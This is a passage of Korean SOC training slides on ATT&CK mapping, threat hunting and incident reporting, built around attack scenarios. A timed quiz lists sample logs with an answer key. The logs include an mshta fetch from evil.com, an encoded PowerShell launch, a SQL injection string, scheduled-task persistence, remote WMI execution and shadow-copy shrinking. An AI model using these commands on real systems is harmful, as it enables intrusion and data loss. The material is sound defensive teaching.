발견된 Azure SP 크리덴셜로 az login → Azure 구독 전체 접근. 추가 IAM 탐색

T1098.001 — 백도어 계정 생성 (Azure AD)

새 Azure AD 글로벌 관리자 계정 생성 → 원래 SP 삭제되어도 지속 접근 유지

T1530 — Azure Blob Storage 데이터 탈취

고객 데이터 포함 Azure Storage 계정 전체 다운로드

탐지 포인트

AWS: CloudTrail — Secrets Manager 비인가 GetSecretValue 호출
AWS: S3 버킷 공개 접근 로그 + .env 파일 GetObject
Azure: 비정상 국가 IP에서 SP 로그인
Azure: 신규 글로벌 관리자 계정 생성 Entra ID 감사 로그
Azure: Storage 계정 대량 List+Get 작업

🚨 멀티클라우드 보안 원칙:
한 클라우드의 Secrets에 다른 클라우드 자격증명 저장 금지 → 크리덴셜 체인이 공격자에게 전체 환경 접근 허용

보강 설명 AWS와 Azure를 동시에 사용하는 기업 환경에서의 멀티클라우드 침해 시나리오입니다. 한 클라우드에서 탈취한 권한으로 다른 클라우드까지 이동하는 체인을 분석합니다. 시간 순서·로그 근거·다음 조치를 한 세트로 묶어 보면 공격 흐름이 더 선명하게 보입니다.

T1526멀티클라우드AWS Azure

흐름 읽기

이 단계가 이전 행위와 어떻게 이어지는지 시간축으로 연결
T1526 근거 로그와 후속 행동을 한 세트로 보기
공격자 목적과 피해 자산을 한 문장으로 적기

현장 판단

정상 운영과 다른 기준 2~3개를 먼저 정해 두기
계정·프로세스·네트워크 증거를 교차 확인하기
즉시 차단과 후속 조사를 나눠서 생각하기

대응 액션

차단 시점이 어디였는지 다시 짚어 보기
보고 문장에는 영향 범위와 다음 조치를 꼭 포함
재발 방지를 위한 룰·정책 개선점까지 메모

시나리오: 제조업 IT→OT 경계 침투 체인

엔지니어링 워크스테이션 침해 → IT-OT 연결 악용 → SCADA 접근 → 생산 중단

OT 침해 시나리오

T1566.001 — 엔지니어 스피어피싱

PLC 펌웨어 업데이트 파일로 위장한 첨부파일 → 엔지니어링 워크스테이션(EWS) 침해

T1082/T1016 — OT 환경 정찰

EWS에서 SCADA 소프트웨어, PLC 연결 설정, HMI IP 목록 파악. OPC-UA 서버 탐색

T0840 — OT 장비 접근 (ICS ATT&CK)

EWS의 정상 SCADA 연결을 통해 PLC 파라미터 조회. 기존 엔지니어 세션 탈취

T0831 — 제어값 조작 (Manipulation of Control)

PLC 온도·압력 제어값 변경 → 생산 라인 이상 작동 → 긴급 정지 또는 설비 손상

OT 침해 탐지 특수 과제

정상 통신 기준선: EWS↔PLC 통신 패턴의 Baseline 수립 → 이탈 시 경보
프로그래밍 명령 감사: PLC 파라미터 변경 감사 로그 (지원 시)
물리 이상 탐지: 센서 값의 갑작스러운 변화 → SCADA HMI 경보와 연계
IT-OT 경계: EWS에서 OT 네트워크로의 비정상 연결 시도

🚨 OT 사고 최우선 원칙:
① 작업자 안전 확인 ② 영향받는 설비 수동 모드 전환 ③ 생산 중단(필요 시) ④ 물리적 격리 → 그 다음에 디지털 포렌식

보강 설명 IT 네트워크에서 OT 네트워크로 침투하는 시나리오입니다. 스피어피싱으로 엔지니어링 워크스테이션을 침해하고, IT-OT 연결을 통해 SCADA 시스템에 접근하는 체인입니다. 시간 순서·로그 근거·다음 조치를 한 세트로 묶어 보면 공격 흐름이 더 선명하게 보입니다.

T1018IT-OT 침투엔지니어링 워크스테이션

흐름 읽기

이 단계가 이전 행위와 어떻게 이어지는지 시간축으로 연결
T1018 근거 로그와 후속 행동을 한 세트로 보기
공격자 목적과 피해 자산을 한 문장으로 적기

현장 판단

정상 운영과 다른 기준 2~3개를 먼저 정해 두기
계정·프로세스·네트워크 증거를 교차 확인하기
즉시 차단과 후속 조사를 나눠서 생각하기

대응 액션

차단 시점이 어디였는지 다시 짚어 보기
보고 문장에는 영향 범위와 다음 조치를 꼭 포함
재발 방지를 위한 룰·정책 개선점까지 메모

팀 대항 타임어택: 15분 ATT&CK 매핑 챌린지

제한 시간 15분 — 팀별로 최대한 많은 로그를 정확하게 매핑하는 팀이 승리

타임어택 챌린지

# 로그 세트 A (각 팀 동일) ━ Log 01 ━ Jun 30 14:22:11 sshd: Accepted publickey for ubuntu from 185.220.101.5 port 43821 ━ Log 02 ━ EXCEL.EXE PID=4201 → WScript.exe PID=5102 WScript.exe → powershell.exe -enc SQBFAFgA ━ Log 03 ━ 14:31:55 POST /api/v1/check 312B → 200 OK 14:33:55 POST /api/v1/check 314B → 200 OK [120초 간격 지속 × 4시간] ━ Log 04 ━ EventID=4769 TicketEncryptionType=0x17 ClientAddress=10.0.0.55 ServiceName=MSSQLSvc ━ Log 05 ━ 03:44 schtasks /create /ru SYSTEM /sc daily /tn "WindowsHelper" /tr "C:\ProgramData\x.exe" ━ Log 06 ━ Sysmon EventID=10 TargetImage=lsass.exe SourceImage=C:\ProgramData\WindowsUpd.exe GrantedAccess=0x1FFFFF

━ Log 07 ━ UPLOAD dropbox.com 2.8GB archive.tar.gz User: john.kim@company.com Time: 02:15 AM ━ Log 08 ━ EventID=4625 Count=45 TargetUser=admin SourceIP=203.0.113.99 Period=3min ━ Log 09 ━ mshta.exe http://evil.com/payload.hta Parent: explorer.exe ━ Log 10 ━ GET /wp-admin/setup-config.php?dbuser= admin'UNION SELECT 1,2,3-- HTTP/1.1 200 ━ Log 11 ━ wmic /node:10.0.0.80 process call create "cmd.exe /c whoami > \\10.0.0.80\C$\tmp.txt" ━ Log 12 ━ vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB

⏱️ 채점: 정확한 Technique (+2) + Sub-technique (+1) + 근거 설명 (+1) = 최대 4점/로그 × 12 = 48점 만점

보강 설명 팀 대항 타임어택 챌린지입니다. 제한 시간 안에 가장 많은 로그를 정확하게 매핑한 팀이 이깁니다. 경쟁 요소가 실제 SOC 긴박감을 체험하게 해줍니다. 근거와 다음 행동을 함께 적어 두면 바로 실무에 쓰기 좋습니다.

타임어택팀 경쟁ATT&CK 매핑

풀이 힌트

문제의 첫 단서를 시간·사용자·프로세스·통신 중 어디서 찾을지 먼저 정리
타임어택를 고를 때 대체 설명도 함께 적기

타임어택 해설 — 12개 로그 정답 빠른 확인

점수 집계와 오답 분석 — 왜 그 Technique인지 핵심 근거만 확인한다

타임어택 해설

#	Technique	핵심 판단 근거
01	T1078.003 Valid Accounts (SSH 공개키)	publickey 인증 성공 + 해외 IP → 공개키 사전 탈취 또는 설치
02	T1059.001+T1027 PowerShell+Obfus	Excel→WScript→PS -enc = 매크로+스크립트+인코딩 체인
03	T1071.001 C2 HTTPS Beaconing	120초 정확 주기 + 크기 일정(312~314B) = Beacon
04	T1558.003 Kerberoasting	EventID 4769 + EncType 0x17(RC4) + MSSQL SPN
05	T1053.005 Scheduled Task	SYSTEM + daily + %ProgramData% + 알 수 없는 바이너리
06	T1003.001 LSASS Memory Dump	Sysmon 10 + lsass.exe Target + 0x1FFFFF(전체 접근)

#	Technique	핵심 판단 근거
07	T1567.002 Exfil to Cloud	Dropbox 2.8GB 업로드 + 새벽 02:15 비업무 시간
08	T1110.001 Password Guessing	3분 내 45회 동일 계정(admin) 실패 = Brute Force
09	T1218.005 Mshta LOLBin	mshta.exe + 원격 URL .hta 파일 = System Binary Proxy
10	T1190 Exploit Public-Facing	UNION SELECT SQLi + WordPress admin + 200 응답
11	T1021+T1047 WMI Lateral	wmic /node:원격IP process create = WMI 원격 실행
12	T1490 Inhibit System Recovery	vssadmin resize → 섀도 복사본 공간 축소 = 복구 방해

보강 설명 타임어택 해설입니다. 빠른 페이스로 정답을 발표하고 점수를 집계합니다. 틀린 로그에 대해 간단히 왜 그 Technique인지 설명합니다. 근거와 다음 행동을 함께 적어 두면 바로 실무에 쓰기 좋습니다.

타임어택 해설빠른 채점핵심 판단 근거

풀이 힌트

문제의 첫 단서를 시간·사용자·프로세스·통신 중 어디서 찾을지 먼저 정리
타임어택 해설를 고를 때 대체 설명도 함께 적기

느리고 조용한 APT 공격: 4주 침해 타임라인 분석

하루 수 건의 이벤트로 탐지 임계값을 피하는 APT — 장기 누적 분석이 핵심

APT 침해 분석

4주 공격 타임라인

주차	활동 (하루 2~3건)	ATT&CK
1주	업무 시간대 스피어피싱 시도 (거부율 높음). 발송 1~2건/일로 탐지 임계값 미달	T1566
2주	피싱 성공 후 조용히 환경 파악. 하루 net 명령 2~3개. 업무 시간에만 활동	T1082 T1018
3주	내부 이동 시도 주 2회. RDP 연결 시간 짧게 유지. 활동 후 로그 정리	T1021 T1070
4주	야간에 대량 데이터 수집 후 분할 전송(단위: 100MB/회, 주 3회)	T1039 T1030

누적 분석 탐지 전략

장기 패턴 분석: 30일 이상 누적 데이터에서 동일 IP·사용자의 저빈도 이상 행위 탐지
업무 시간 외 미세 활동: 업무 시간 기준선 이탈 (분·초 단위 이상) 탐지
소규모 분할 전송: 단건이 아닌 주간 누계로 Exfiltration 탐지
로그 클리어 패턴: 활동 후 일정 시간 내 로그 삭제 패턴 상관

⚠️ 소급 탐지 필수: APT는 현재 경보로 탐지 불가. 1개월치 로그를 소급 분석해야 초기 침투 시점 파악 가능. 로그 보존 기간이 짧으면 공격 시작점을 영원히 모름

보강 설명APT 공격은 탐지를 피하기 위해 매우 느리고 조용하게 진행됩니다. 한 달에 걸친 침해에서 각 주차별 활동 패턴을 분석하고 어떤 방법으로 탐지할 수 있는지 다룹니다. 시간축과 로그 근거를 함께 묶어 설명하면 공격 체인의 맥락이 훨씬…

T1566T1082APT 느린 공격

시나리오 확장

T1566가 앞뒤 단계와 어떻게 이어지는지 정리
T1082를 시간축으로 놓고 체인으로 연결하기
공격자 목적과 피해 자산을 한 문장으로 설명

판단 포인트

정상 운영과 다른 기준 2~3개를 명확히 적기
계정·프로세스·네트워크 증거를 함께 교차 보기
차단 시점과 피해 최소화 지점을 구분해 보기

실무 적용

즉시 조치와 후속 조치를 나눠서 제안
보고 문장에는 ATT&CK ID와 영향 범위 포함
재발 방지를 위한 룰·정책 보완점까지 적기

ATT&CK 업데이트 추적: 분기별 변경 관리 방법

살아있는 지식베이스 — 분기 업데이트를 탐지 룰에 반영하는 체계적 프로세스

ATT&CK 유지보수

분기별 업데이트 추적 프로세스

릴리즈 노트 확인 — attack.mitre.org/resources/updates/에서 신규·수정·삭제 Technique 목록 확인

영향도 분석 — 우리 탐지 룰 중 변경된 Technique에 영향받는 룰 식별

신규 Technique 검토 — 새 Technique의 Data Source·탐지 전략 확인 → 우선순위 평가

룰 업데이트 — Deprecated Technique 태그 업데이트, 신규 Technique 룰 추가 계획 수립

버전 업데이트 유형별 대응

신규 Technique 추가: Detection 섹션 분석 → Coverage 분석에 추가 → 룰 작성 백로그 등록
기존 Technique 수정: 변경된 Data Source·탐지 전략 확인 → 기존 룰 검토 필요 여부 판단
Sub-technique 추가: 기존 Technique 룰의 세분화 여부 검토
Deprecated 처리: 연관 룰의 ATT&CK 태그 업데이트 또는 폐기 검토

💡 자동화 팁: MITRE의 STIX 형식으로 ATT&CK을 다운로드 → 이전 버전과 diff 비교 → 변경 Technique 자동 추출 스크립트 구현 가능 (Python + stix2 라이브러리)

보강 설명 ATT&CK은 분기별로 업데이트됩니다. 새 Technique 추가, 기존 Technique 수정, Deprecated 처리를 추적하고 탐지 룰에 반영하는 방법을 다룹니다. 로그 보유 여부보다 어떤 조건에서 잡히고 어디서 오탐이 나는지까지 함께 보는 것이 실무 품질을 좌우합니다.

ATT&CK 버전 업데이트분기 업데이트신규 Technique

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
ATT&CK 버전 업데이트·예외 조건·출력 필드를 함께 설계
알림이 어떤 플레이북으로 이어질지 같이 적기

튜닝 관점

오탐과 미탐을 따로 나눠 점검하기
시간대·자산 중요도·허용 목록으로 맥락 보강
검증 결과를 Coverage와 backlog에 반영하기

운영 연결

대시보드·티켓·보고 문장을 같은 ATT&CK 언어로 정렬
Purple Team 또는 재현 로그로 룰을 실제 검증
분기별 ATT&CK 업데이트와 함께 룰을 다시 점검

완전한 헌팅 플레이북 작성: T1558.003 Kerberoasting

가설 → 데이터 → 쿼리 → 판단 → 결과 문서화까지 한 장에 완성하는 실전 플레이북

헌팅 플레이북 실전

플레이북 ID	HUNT-2024-K001
ATT&CK	T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting
헌팅 가설	만약 공격자가 Kerberoasting을 시도했다면, 비DC 호스트에서 RC4 암호화(0x17) Kerberos TGS 티켓 요청이 단시간 내 다수 SPN에 대해 발생했을 것이다
트리거	최근 CTI: 국내 금융권 타겟 APT 그룹이 Kerberoasting 활용 확인
데이터 원천	Windows EventID 4769 (DC의 보안 이벤트 로그)
탐색 기간	최근 30일
정상 제외	DC 계정($), 정상 서비스 계정(krbtgt, SQL서비스계정)
판단 기준	동일 IP에서 5분 내 5개 이상 다른 SPN에 RC4 TGS 요청

# 헌팅 쿼리 (Splunk) index=winevent EventCode=4769 TicketEncryptionType=0x17 NOT ServiceName IN ("krbtgt", "*$") earliest=-30d | bucket _time span=5m | stats dc(ServiceName) as unique_spn values(ServiceName) as spn_list by _time, ClientAddress, ClientName | where unique_spn >= 5 | sort -unique_spn

결과 기록 템플릿

실행일: ___________
발견 건수: ___건 (정상 확인 ___건 / 추가 조사 ___건)
Coverage 평가: EventID 4769 수집 ○/✗
개선 사항: ___________

보강 설명 지금까지 배운 헌팅 방법론을 모두 활용해 하나의 완전한 헌팅 플레이북을 작성합니다. T1558.003 Kerberoasting을 대상으로 가설부터 결과… 조건·예외·운영 연결까지 보면 실무성이 높아집니다.

T1558.003헌팅 플레이북 완성가설 수립

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
T1558.003·예외 조건·출력 필드를 함께 설계

최종 서술형 평가 — 종합 역량 측정 (30분)

5개 서술형 문항 × 20점 = 100점 — 근거와 논리가 정답보다 중요하다

최종 평가

서술형 평가 문항

[매핑 역량]
다음 로그를 보고 ATT&CK 공격 체인을 재구성하시오. 각 Technique의 근거와 Confidence를 명시하고 전체 30초 보고 문장을 완성하시오.
(로그 세트 첨부)

[탐지 설계]
T1021.002 SMB/Windows Admin Shares를 탐지하는 SIEM 쿼리를 작성하고, 오탐 필터와 판단 기준을 설명하시오.

[헌팅 역량]
"최근 CTI 보고서에서 APT 그룹이 T1055 Process Injection을 사용한다"는 정보를 기반으로 헌팅 가설과 실행 계획을 수립하시오.

[Coverage 분석]
Lateral Movement Tactic의 Coverage를 분석하고 가장 시급한 공백 2개와 개선 방법을 제시하시오.

[경영진 보고]
Kerberoasting 공격이 확인된 상황을 CISO에게 3문장으로 보고하는 문장을 작성하시오 (ATT&CK ID 사용 금지).

채점 기준 (문항당 20점)

평가 요소	배점
ATT&CK 매핑 정확성	6점
근거 로그·데이터 제시	5점
논리적 흐름·구조	5점
실무 적용 가능성	4점

💡 주의사항:
• 틀린 Technique ID보다 맞는 근거가 더 높은 점수
• 모르면 "추가 확인 필요" + 이유를 쓰는 것이 공란보다 좋음
• Q5는 ATT&CK 용어 없이 비즈니스 언어로만 작성

보강 설명 최종 평가 서술형 문제입니다. 객관식이 아닌 서술형으로 분석 역량을 종합 평가합니다. 30분 개인 작성 후 강사가 채점합니다. 정답보다 근거 로그·Confidence·다음 행동까지 같이 적어 두면 발표와 문서화가 훨씬 수월합니다.

최종 서술형 평가종합 역량 측정분석 역량

풀이 힌트

문제의 첫 단서를 시간·사용자·프로세스·통신 중 어디서 찾을지 먼저 정리
최종 서술형 평가를 고를 때 대체 설명도 함께 적기
근거 문장은 실제 로그 한 줄을 짧게 인용해 작성

발표 포인트

시작→진행→영향→다음 행동 순서로 30초 설명
Confidence가 낮다면 추가 수집 항목을 같이 제시
팀 토론에서는 근거가 강한 판단부터 먼저 합의

체크리스트

Tactic·Technique·근거·Confidence 네 칸을 빠짐없이 채우기
정상 가능성과 공격 가능성을 동시에 적어 보기
발표 전에 한 문장 보고 버전으로 한 번 더 압축

위협 그래프 분석: 공격 경로를 노드-엣지로 시각화

이벤트(노드)와 관계(엣지)로 구성된 공격 그래프 — 복잡한 침해를 직관적으로 파악한다

고급 분석 기법

공격 그래프 예시 (피싱→C2→데이터유출)

📧 피싱 메일 수신

→ T1566.001

💻 kim.soyeon PC

↓ T1059.001

⚡ PowerShell 실행

→ T1071.001

📡 C2: evil.com

↓ T1021.001

🖥️ 파일서버 RDP 이동

→ T1039+T1567

☁️ Dropbox 유출

위협 그래프 구성 요소

노드 유형: 호스트, 사용자 계정, 프로세스, 파일, 네트워크 연결, 외부 인프라
엣지 유형: 인증, 프로세스 생성, 파일 접근, 네트워크 통신, 데이터 이동
ATT&CK 태그: 각 엣지에 관련 Technique ID 부착
시간 축: 그래프의 왼쪽(시작)에서 오른쪽(최신)으로 시간 흐름 표현

위협 그래프 도구

Maltego: OSINT 기반 관계 시각화 (CTI 용)
Neo4j + BloodHound: AD 권한 경로 그래프 분석
Elastic Graph: SIEM 내 이벤트 관계 시각화
MITRE ATT&CK Workbench: 사건 분석 그래프 작성

보강 설명공격 경로를 그래프로 시각화하면 ATT&CK 체인의 연결 관계가 명확해집니다. 노드(이벤트)와 엣지(관계)로 구성된 위협 그래프를 통해 복잡한 침해를 직관적으로 파악하는 방법을 다룹니다. 로그 근거와 운영 액션까지 한 문장으로 이어 보면 학습 효과가 커…

T1566.001T1059.001위협 그래프

설명 확장

T1566.001를 목적-기술-근거 관점으로 다시 정리하기
T1059.001와 연결되는 대표 로그 또는 예시 1개 추가
앞뒤 단계와 이어지는 공격 체인을 한 줄로 설명

판단 포인트

정상 행위와 의심 행위를 나누는 기준 2개 적기
Confidence를 높일 추가 증거와 확인 순서 메모
즉시 조치와 후속 조치를 분리해서 생각하기

학습 요소

위협 그래프 관련 ATT&CK ID·로그·대응을 묶어 기억하기
오탐 가능성과 공백 로그를 함께 체크하기
실무 보고 문장으로 바꿔 말해 보기

Advanced: 공격자의 탐지 우회 기법과 대응

우회 기법을 알아야 더 강한 탐지를 만들 수 있다 — 적을 알아야 지킬 수 있다

고급 Defense Evasion

우회 기법	원리	ATT&CK	대응 방법
AMSI Bypass	amsi.dll의 AmsiScanBuffer 함수 패치로 스캔 비활성화	T1562.001	Tamper Protection, AMSI provider 감사 로그
ETW Tampering	Event Tracing for Windows 비활성화로 로깅 차단	T1562.006	ETW provider 등록 상태 모니터링
BYOVD	취약한 합법 드라이버로 커널 탐지 우회	T1014	드라이버 허용 목록(Blocklist), HVCI
Phantom DLL Hijacking	존재하지 않는 DLL 위치에 악성 DLL 배치	T1574.001	DLL 검색 경로 감사, 서명 검증
Process Hollowing	정상 프로세스 메모리를 악성 코드로 교체	T1055.012	Sysmon EventID 8, 메모리 스캔
Indirect Syscall	ntdll 후킹을 피해 직접 시스콜로 커널 호출	T1106	EDR 커널 레벨 탐지 필요

우회 기법 탐지의 현실

고급 우회 기법은 단일 탐지 레이어로 불가 → 다중 레이어 필수
커널 수준 탐지 없으면 BYOVD 등 탐지 불가 → 최신 EDR 요구
AMSI/ETW 비활성화는 그 자체가 강한 경보 신호 → 즉각 대응
공격자가 우회에 시간·리소스를 쓴다는 것은 공격 자체가 어렵다는 의미 → 장벽이 됨

⚠️ 탐지가 어려울수록 더 중요한 것:
우회 기법을 모두 탐지하려 하기보다, 공격자가 반드시 거쳐야 하는 구간(C2 통신, 자격증명 사용, 데이터 전송)에서 탐지에 집중하는 것이 실용적

보강 설명 공격자가 탐지를 우회하는 고급 기법을 이해해야 더 강한 탐지 체계를 만들 수 있습니다. AMSI Bypass, ETW Tampering, 드라이버 기반 우회 등 최신 회피 기법과… 조건·예외·후속 조치를 같이 봐야 탐지 품질이 올라갑니다.

T1562AMSI BypassETW Tampering

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
T1562·예외 조건·출력 필드를 함께 설계
알림이 어떤 플레이북으로 이어질지 같이 적기

튜닝 관점

오탐과 미탐을 따로 나눠 점검하기
시간대·자산 중요도·허용 목록으로 맥락 보강
검증 결과를 Coverage와 backlog에 반영하기

침해 사후 보고서(PIR) 작성 실습

팀 과제 시나리오를 기반으로 기술 보고서 + 경영진 요약 보고서를 동시에 작성한다

PIR 작성 실습

PIR 필수 구성 요소

사건 개요: 발생 일시·발견 일시·영향 범위
공격 타임라인: 시간별 ATT&CK 매핑 표
근본 원인 분석: 왜 이 침해가 가능했는가 (기술·프로세스·인적 요소)
피해 범위: 영향 시스템·데이터·계정·비즈니스
대응 조치: 탐지→봉쇄→제거→복구 단계별 액션
재발 방지: 단기(1주)·중기(1월)·장기(분기) 개선 계획
IOC 목록: 공유 가능한 형태로 정리
교훈 및 권고: SOC 프로세스·Coverage 개선 권고

경영진 요약 (1페이지) 구조

사건 1문장: 언제, 무엇이, 어떻게 발생했나
비즈니스 영향: 데이터 유출 여부, 서비스 중단, 규제 신고 필요성
현재 상태: 봉쇄 완료 여부, 잔존 위험
투자 요청: 재발 방지를 위한 투자 항목과 금액
다음 보고 일정: 진행 상황 업데이트 시점

⏱️ 작성 과제 (20분):
팀 과제 시나리오 기반으로
① 기술 보고서 핵심 섹션 작성
② 경영진 요약 1페이지 작성
→ 팀별 5분 발표

보강 설명실제 사고 후 작성하는 PIR(Post-Incident Report) 작성 실습입니다. 정답보다 근거·Confidence·다음 행동을 함께 말하도록 채워 두면 발표 완성도가 높아집니다.

PIRPost-Incident Report기술 보고서

설명 확장

PIR 기준으로 첫 단서를 먼저 분류하기
Post-Incident Report를 왜 선택했는지 근거 한 줄로 적기
정답보다 판단 과정을 말로 설명하기

판단 포인트

정상 행위와 의심 행위를 구분하는 기준 메모
High·Medium·Low Confidence 이유 함께 쓰기
추가 수집이 필요한 로그를 마지막에 적기

실습 적용

시작-진행-영향-다음 행동 순서로 30초 설명
탐지 룰 또는 헌팅 가설 1개까지 연결
팀 토론에서는 근거가 강한 판단부터 합의

ATT&CK × D3FEND 심화: 공격-방어 기술 매핑

Technique별로 어떤 방어 기술을 적용할 수 있는지 — 보안 아키텍처 설계의 체계적 방법

D3FEND 심화

D3FEND 5개 방어 카테고리

🔍 Detect (탐지): 공격 행위를 탐지하는 기술 — SIEM, EDR, NDR
🔒 Isolate (격리): 공격 확산을 막는 기술 — 네트워크 세그멘테이션, 격리
🎭 Deceive (기만): 공격자를 속이는 기술 — 허니팟, 허니토큰
🛡️ Harden (강화): 공격 면을 줄이는 기술 — MFA, 최소 권한, 패치
🚫 Evict (퇴출): 공격자를 제거하는 기술 — 계정 삭제, 세션 종료

ATT&CK Technique	D3FEND 탐지	D3FEND 강화	D3FEND 기만
T1566 Phishing	메일 분석 (D3-MEA)	DMARC (D3-DMAE)	허니메일 (D3-HN)
T1110 Brute Force	로그인 실패 분석	계정 잠금 정책	허니토큰 계정
T1003 Credential Dump	메모리 접근 탐지	Credential Guard	가짜 크리덴셜
T1021 Remote Services	네트워크 트래픽 분석	마이크로 세그멘테이션	허니 RDP 서버
T1071 C2 Protocol	Beaconing 분석	DNS 필터링	싱크홀 도메인

📍 d3fend.mitre.org → Technique 검색 → "Counters" 탭에서 해당 ATT&CK Technique에 대응하는 D3FEND 기술 목록 확인

보강 설명 D3FEND를 ATT&CK과 함께 심화 분석합니다. 각 공격 Technique에 대응하는 방어 기술(Detect, Isolate, Deceive, Harden, Evict)을 매핑하는 방법과 실무 활용법을… 정의만 외우기보다 왜 필요한지, 어떤 로그·행동과 연결되는지 함께 기억하면 이해가 오래갑니다.

D3FEND공격-방어 매핑Detect Isolate De…

이해 포인트

D3FEND를 목적·행위·근거 관점으로 다시 정리
대표 예시 하나를 떠올려 실제 로그와 연결하기
비슷한 용어와 헷갈리는 차이를 한 문장으로 정리

현업 연결

실무에서 먼저 볼 로그나 도구를 함께 메모하기
이 개념이 보고·탐지·대응 어디에 쓰이는지 구분
다음 슬라이드와 이어지는 질문을 하나 만들어 보기

복습 질문

왜 필요한지 팀원에게 20초로 설명해 보기
공격-방어 매핑 1개와 묶어 기억하기
오탐 가능성 또는 해석 한계도 함께 적어 두기

대용량 로그에서 침해 흔적 찾기: 효율적 검색 전략

수백만 건 중 수십 건을 찾는 기술 — 전략적 필터링과 피벗 분석

실전 검색 전략

효율적 검색 전략

IOC 우선 검색: 알려진 IP·도메인·해시로 가장 빠르게 히트 여부 확인 → 있으면 즉시 인시던트 전환

희귀성 분석: "처음 본 것"에 집중 — 신규 프로세스명, 처음 등장한 외부 IP, 신규 계정

시간 앵커: 경보 발생 전후 10~30분 집중 검색 → 공격 준비·후속 행위 탐색

엔터티 피벗: IP→사용자명→호스트명→프로세스 순서로 같은 엔터티 중심 소용돌이 검색

크로스 소스: 한 소스 히트 후 다른 소스에서 같은 엔터티 검색 → 연결 확인

# 희귀 프로세스 찾기 (Splunk) # 최근 7일 중 처음 등장한 프로세스 index=sysmon EventCode=1 earliest=-7d | stats min(_time) as first_seen by Image | where first_seen > relative_time(now(), "-24h") | sort first_seen # → 지난 24시간 내 처음 등장한 프로세스 목록

💡 피벗 분석 예시:
악성 IP 발견 → 동일 IP에서 연결된 모든 내부 호스트 → 해당 호스트의 모든 이상 프로세스 → 해당 프로세스의 모든 파일 접근 → ... (소용돌이 확장)

보강 설명 실제 SOC에서는 수백만 건의 로그에서 침해 흔적을 찾아야 합니다. 효율적인 검색 전략과 필터링 방법을 통해 빠르게 의심 이벤트를 좁혀가는 방법을 다룹니다. 정의만 외우기보다 왜 필요한지, 어떤 로그·행동과 연결되는지 함께 기억하면 이해가 오래갑니다.

대용량 로그효율적 검색검색 전략

이해 포인트

대용량 로그를 목적·행위·근거 관점으로 다시 정리
대표 예시 하나를 떠올려 실제 로그와 연결하기
비슷한 용어와 헷갈리는 차이를 한 문장으로 정리

현업 연결

실무에서 먼저 볼 로그나 도구를 함께 메모하기
이 개념이 보고·탐지·대응 어디에 쓰이는지 구분
다음 슬라이드와 이어지는 질문을 하나 만들어 보기

복습 질문

왜 필요한지 팀원에게 20초로 설명해 보기
효율적 검색 1개와 묶어 기억하기
오탐 가능성 또는 해석 한계도 함께 적어 두기

다크웹 인텔리전스: SOC 운영에서의 실용적 활용

다크웹 정보를 합법적·윤리적으로 수집해 자격증명 유출 사전 탐지와 위협 행위자 추적에 활용

다크웹 TI

SOC에서 활용 가능한 다크웹 TI 유형

자격증명 유출 모니터링: 기업 도메인(@company.com) 포함 유출 계정 알림 → 선제적 비밀번호 강제 변경
공격 인프라 추적: 신규 C2 서버·피싱 도메인·악성 인증서 등록 탐지
위협 행위자 커뮤니티: 특정 APT 그룹의 새 TTP 토론·계획 인텔리전스
취약점 제로데이 유통: 우리 환경 관련 제로데이 시장 동향 파악
데이터 유출 마켓: 기업 데이터가 판매 중인지 모니터링

합법적 다크웹 TI 도구

Have I Been Pwned (HIBP): haveibeenpwned.com API로 도메인 유출 모니터링
Recorded Future, Flashpoint: 상용 다크웹 인텔리전스 플랫폼
Intel471, Digital Shadows: 위협 행위자 추적 전문 서비스
KISA C-TAS: 국내 사이버위협 정보 공유 시스템

⚠️ 윤리·법적 주의:
다크웹 직접 접근은 법적 위험. 공인된 TI 서비스를 통한 간접 수집이 원칙. 수집한 인텔리전스의 법적 사용 범위 법무팀 사전 확인 필수

보강 설명다크웹에서 수집되는 위협 인텔리전스를 SOC 운영에 활용하는 방법입니다. 자격증명 유출 모니터링, 공격 인프라 추적, 위협 행위자 커뮤니티 분석 등을 다룹니다. 로그 근거와 운영 액션까지 한 문장으로 이어 보면 학습 효과가 커…

다크웹 인텔리전스자격증명 유출 모니터링Have I Been Pwned

설명 확장

다크웹 인텔리전스를 목적-기술-근거 관점으로 다시 정리하기
자격증명 유출 모니터링와 연결되는 대표 로그 또는 예시 1개 추가
앞뒤 단계와 이어지는 공격 체인을 한 줄로 설명

판단 포인트

정상 행위와 의심 행위를 나누는 기준 2개 적기
Confidence를 높일 추가 증거와 확인 순서 메모
즉시 조치와 후속 조치를 분리해서 생각하기

학습 요소

Have I Been Pwned 관련 ATT&CK ID·로그·대응을 묶어 기억하기
오탐 가능성과 공백 로그를 함께 체크하기
실무 보고 문장으로 바꿔 말해 보기

Detection as Code: 탐지 룰 CI/CD 파이프라인

탐지 룰을 소프트웨어처럼 — 버전 관리·자동 테스트·자동 배포로 품질과 속도를 동시에

탐지 자동화

👨‍💻 분석가
Sigma 룰 작성

→

📂 Git Push
Feature Branch

↓ Pull Request 생성

🤖 CI 자동 검사
Sigma Lint

→

🧪 자동 테스트
Atomic Red Team

↓ 리뷰 승인

🔄 자동 변환
Sigma → SIEM

→

🚀 자동 배포
Staging SIEM

→

✅ 운영 SIEM

CI/CD 자동화 도구 스택

GitHub/GitLab: 룰 저장소 + PR 리뷰 워크플로우
GitHub Actions: CI 파이프라인 트리거
sigma-cli: Sigma 룰 검증 + 플랫폼 변환
Atomic Red Team: 자동 탐지 검증 테스트
Splunk/Elastic API: 룰 자동 배포

✅ Detection as Code 이점:
• 룰 변경 이력 완전 추적
• 자동 품질 검사로 오류 사전 차단
• 새 룰 배포 시간 수일 → 수분으로 단축
• 팀 간 지식 공유와 재사용 촉진

보강 설명탐지 룰을 코드처럼 관리하고 자동으로 배포하는 탐지 엔지니어링 자동화 파이프라인을 소개합니다. 데이터 원천·오탐 구분·운영 액션까지 연결해야 실무 적용도가 높아집니다.

Detection as CodeCI/CD 파이프라인자동 배포

설계 포인트

Detection as Code에 필요한 Data Source를 먼저 정리하기
CI/CD 파이프라인를 어떤 조건으로 탐지할지 구체화하기
룰·대시보드·플레이북을 같은 언어로 정렬하기

튜닝 포인트

화이트리스트·시간대·자산 중요도 조건 추가
False Positive와 False Negative를 따로 점검
검증 결과를 Coverage 점수에 반영하기

운영 적용

분기별 ATT&CK 버전 업데이트를 체크리스트화
CTI·Purple Team 결과를 룰 개선 backlog로 연결
티켓 문장까지 동일한 ATT&CK 용어로 통일

실전 케이스: LockBit 유형 랜섬웨어 그룹 TTP 분석

